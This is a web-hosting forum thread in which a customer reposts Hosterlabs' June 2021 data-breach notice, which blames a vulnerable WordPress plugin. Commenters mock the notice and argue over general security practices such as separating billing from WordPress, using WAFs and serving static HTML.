Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Hosterlabs data breach
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Hosterlabs data breach

edited June 2021 in Providers

Just got this email:

We are writing to you because of an incident involving access to information associated with online purchases made on our website www.hosterlabs.net. Although we are unaware of any actual misuse of your information, we are providing notice to you and other potentially affected customers about the incident, and about tools you can use to protect yourself against possible identity theft or fraud.

What Happened?

We were discovered on June 22, 2021 that our website www.hosterlabs.net experienced an intrusion the day June 21,2021. The intruder or intruders placed malware on the our servers, and by doing so gained access to our customers’ data. To date, the investigation indicates that the intrusion began around the 21st of June ca. 9 AM.

At first we noticed our website hosterlabs.net/panel/ was offline and not working. Further investigation seemed to reveal a problem with the databases, we thought they were corrupted. After further investigation we found messages from "hackers" threatening to make the information on the databases public/selling them and they asked us for money in exchange of them returning us the information, because it was deleted. We do have backups that we do on a daily basis and as such we decided not to pay any ransom. We have disaster plans and prevention on all servers and platforms. We have had false alarms of hackings in the past, hence all our systems are extremely secured but unfortunately there is nothing that can not be hacked. The hack came through our Wordpress main site hosterlabs.net/ where hackers possibly injected viruses through a vulnerability within one or more plugins we have. These vulnerabilities have been fully isolated and fixed. For now security is really tight but we will add further security in the upcoming days as well as changing how our systems are designed internally.

What information was included?

Name, Last Name, E-mail, Address and personally identifiable information.
Passwords were most likely not stolen, nevertheless, please change your passwords for your VPS/Hosting accounts and your control panel account.
No credit card information was stolen, no intrusion in any other systems took place. Please make sure to change your password in all of our services.

Is the breach fixed?

Yes we have tracked the malware and it has completely been removed from our sites.

What did you do to increase your security?

We have added further firewalls, active monitoring and we are working as of now with law enforcement to track the perpetrators of the crime. We have notified the FBI and we expect to do forensics on our servers, for which we have backed up all logs and accesses.

What kind of security do you have/ how do we know our information was protected?

Your information was protected to the best of our abilities as we have experience aiding and making sure other peoples' servers are secure. We have seen/traced/removed similar hackings from customers. Most of our servers are unreachable outside our working spaces and require special authentications. This breach was just exploiting a plugin we had on our Wordpress site. We will revise all our security policies and keep you updated.

Thanked by 2JasonM raindog308
«1

Comments

  • bruh21bruh21 Member, Host Rep

    :#

  • jsgjsg Member, Resident Benchmarker

    At least they make me laugh ...

    Hosterlabs said right on their homepage:
    [Q] Is my data safe?
    [A] Yes.

    Also , but could also be me missing something, I did not find any mentioning of the data breach on their site.

    Thanked by 1NobodyInteresting
  • RazzaRazza Member
    edited June 2021

    Security wise it's not the best Idea to have Wordpress and billing system on same vhost.

    If you're going to host them on the same server for best security have billing hosted on a separate vhost eg subdomain running as a different php user as long as its setup properly if the main site is compromise billing should be fine.

    Thanked by 3bdl feezioxiii CConner
  • HosterlabsHosterlabs Member
    edited June 2021

    @Razza said:
    Security wise it's not the best Idea to have Wordpress and billing system on same vhost.

    If you're going to host them on the same server for best security have billing hosted on a separate vhost eg subdomain running as a different php user as long as its setup properly if the main site is compromise billing should be fine.

    We had planned to deprecate Wordpress and use Gatsby in the near future. Again our apologies.

    P.D. No VM data, no server credentials, credit cards or passwords were leaked.

    Thanked by 1kkrajk
  • MaouniqueMaounique Host Rep, Veteran

    I know many people will come out and say that, when used correctly (patched every day, WP as well as plugins, correct permissions, well isolated, no shady plugins or from shady sources, etc) WP is safe but almost everything is safe this way.
    The general idea is to use something with a low attack surface.
    IMO, a flashy (both senses of the word!) site for a host is not really needed, just highlight the packages in a clearly readable form as well as ToS/AUP payment methods and that is about it.
    Using heavy CMS with tons of plugins is probably not a good idea in most situations.

    Thanked by 3jsg MannDude kalipus
  • seriesnseriesn Member
    edited June 2021

    And this is why, we use html for everything minus billing and forum. Better yet, each of them run on their own server and none talks to other :)

  • jsgjsg Member, Resident Benchmarker

    @seriesn said:
    And this is why, we use html for everything minus billing and forum. Better yet, each of them run on their own server and none talks to other :)

    Yes!

    Btw. HTML5 is damn good enough and when dealing with customer data security should be more important than eye candy.

    One more reason to like NexusBytes / @seriesn.

    Thanked by 2seriesn bdl
  • bdlbdl Member

    @Hosterlabs - FYI "Delaware" is misspelled on your main page.

  • Apparently it was a quiz maker plugin for WordPress that involucrated the security...

  • HxxxHxxx Member
    edited June 2021

    In my opinion the issue is poor deployment. Is not even Wordpress the issue, as long as you have WP with a decent WAF just like wordfence you are good to go. But putting this aside the real problem here is the deployment of the systems and wordpress in the same account.

    As very useful and also very basic rule always separate crucial systems from website. Basically just deploy anything in sub domains or different domains, but that's just step 1. Hosting is so cheap nowadays that I would say NEVER host two things in the same account or VHOST. Just changing the way you think about this and applying this... you are making your stuff more secure.

    Step 2) Only host in the same server if you have cageFS (cloudlinux) or an equivalent system that put some walls around each account and prevent an exploit or a hack from jumping into the other account. In this case it was all deployed in one account, super easy for any attacker to compromise the other system. Also is even more secure if you just use different servers for each system, by doing this you are not depending on CageFS implementation. Just setup different servers and use subdomains (if using the same domain as the website) or just other domains and create an A record for those servers.

    Step 3) Have a WAF in place, harden the systems. A WP well hardened and using well implemented plugins is solid... period. Even if you were irresponsible and left the WP with pending updates over a long period, if you have a good WAF (with real time updates) it will catch and block such attacks. Highly recommend wordfence , even the free tier. Make sure to configure it properly.

    Let's get it done correctly.

    Cordially / Respectfully

    Thanked by 2bdl kalipus
  • Shit happens.

    Providers need to focus on proactive security measures.

  • kalimov622kalimov622 Member
    edited June 2021

    Giving real details when you sign up with a host makes it even harder with this kind of news. Fortunately you can edit most of them after you place an order and your service is active but some hosts don't allow personal details change at all. That's not really a problem until something like this happens.

  • jsgjsg Member, Resident Benchmarker
    edited June 2021

    @Hxxx

    Sorry, no.If a provider feels the need to have a WP (or other) machinery driving their eye candy sigte, they can do so - but on another server that is completely separate.

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP
    • minimalistic in terms of eye candy. HTML 5 offers enough for a decent front end.
    • all focused on stability, safety, reliability, and security.
    • mistrusting both in terms of access and of input (treat any and all input as if coming from adversaries)

    A WP (or similar) based system is pretty much the recipe of how not to do it.

  • @jsg said: .. their eye candy sight, ..

    Pun intended?

    Thanked by 1jsg
  • LeviLevi Member

    That "FBI" part was hilarious :D

  • @LTniger said:
    That "FBI" part was hilarious :D

  • HxxxHxxx Member
    edited June 2021

    @jsg said:
    @Hxxx

    Sorry, no.If a provider feels the need to have a WP (or other) machinery driving their eye candy sight, they can do so - but on another server that is completely separate.

    Please read. That's what I said.

  • jsgjsg Member, Resident Benchmarker

    @AlwaysSkint said:

    @jsg said: .. their eye candy sight, ..

    Pun intended?

    No, a stupid mistake. Corrected, thank you!

    Thanked by 1AlwaysSkint
  • HxxxHxxx Member
    edited June 2021

    Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch. People use wordpress just to not mess with HTML or PHP directly, just convenience that a CMS provides.

    Be informed please, You just comment everywhere clueless...

    Respectfully / Cordially.

  • @Hxxx said:
    Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch. People use wordpress just to not mess with HTML or PHP directly, just convenience that a CMS provides.

    Be informed please, You just comment everywhere clueless...

    Respectfully / Cordially.

    You need less Jesus.

    Thanked by 1jsg
  • HxxxHxxx Member

    @dahartigan said:

    @Hxxx said:
    Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch. People use wordpress just to not mess with HTML or PHP directly, just convenience that a CMS provides.

    Be informed please, You just comment everywhere clueless...

    Respectfully / Cordially.

    You need less Jesus.

    Less LET. Just the same individuals spamming the forum with wrong information.

    Thanked by 1TimboJones
  • jsgjsg Member, Resident Benchmarker

    @Hxxx said:
    Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch.

    Really? Duh!

    Thanks for confirming my "clueless" view.

    Thanked by 2Hxxx dahartigan
  • HxxxHxxx Member

    @jsg You are welcome. Have a nice day.

  • ((shakes head, in disbelief as a disbeliever))
    Where's that Picard meme, when you need it?

    Thanked by 1dahartigan
  • yoursunnyyoursunny Member, IPv6 Advocate

    @jsg said:
    @Hxxx

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP

    When are you going to develop such a system and make it freely available?
    Actions are louder than words.

    P.S. I made one with bash, not PHP, although it's superseded by Vagrant now.
    https://yoursunny.com/p/vmapi/

    Thanked by 1dahartigan
  • jsgjsg Member, Resident Benchmarker
    edited June 2021

    @yoursunny said:

    @jsg said:
    @Hxxx

    The core that holds and deals with customer (and other confidential business) data should be

    • on a separate server and preferably not on a VM
    • split into a back end and a front end with only the latter accessible - in any way - from outside.
    • the front end serving only as interface
    • as minimal as reasonably feasible
    • based on solid statically typed languages and in particular not based on PHP

    When are you going to develop such a system and make it freely available?

    When I get paid to do it.

    (see, @AlwaysSkint I'm beginning to get it right, your efforts are not wasted ;) )

  • AlwaysSkintAlwaysSkint Member
    edited June 2021

    LMFTFY

    @jsg said: I'm begging to get it right,

    :p
    Meanwhile, loosely on topic. This is why I keep my games (tablet, Wii/PS3 whatever), phone (no financial transactions) and laptop (web stuff, sites) separate. It's a similar principle.

    Thanked by 2yoursunny dahartigan
  • raindog308raindog308 Administrator, Veteran

    @Hxxx said: Also @jsg wordpress has nothing to do with eye candy shit. You can have a website in plain HTML5 with CSS3 , bootstrap, etc you know... the usual bullshit and if you are good you can make it look top notch. People use wordpress just to not mess with HTML or PHP directly, just convenience that a CMS provides.

    It's not the CMS convenience as much as the design convenience. Yes, you can make a site look very snazzy without WP...but then you have to hire someone to make you a site or do it yourself. With WP, you can just throw up a template and it looks halfway decent and in the lowend world, that is very attractive.

    An important consideration here is that providers' web sites are greater attack magnets than many other sites, so they need extra care, which argues for the approach @seriesn takes - static HTML, with interactive apps segmented. Heck, if I was a provider my web site would be completely on CDN.

  • @yoursunny said: P.S. I made one with bash, not PHP, although it's superseded by Vagrant now.

    https://yoursunny.com/p/vmapi/

    That looks neat!

    Thanked by 1yoursunny
  • @raindog308 said: With WP, you can just throw up a template and it looks halfway decent

    Very true, however the problems come when the average person starts adding these extra (in many cases unnecessary) themes and plugins without understanding the security implications of doing so.

    It doesn't take too long on a fresh WP install until a vulnerable 3rd party plugin or theme becomes compromised and the account starts sending spam or mining.

    Pure HTML is beautiful simplicity, we don't need dynamic sites (particularly PHP) for every damn thing.

Sign In or Register to comment.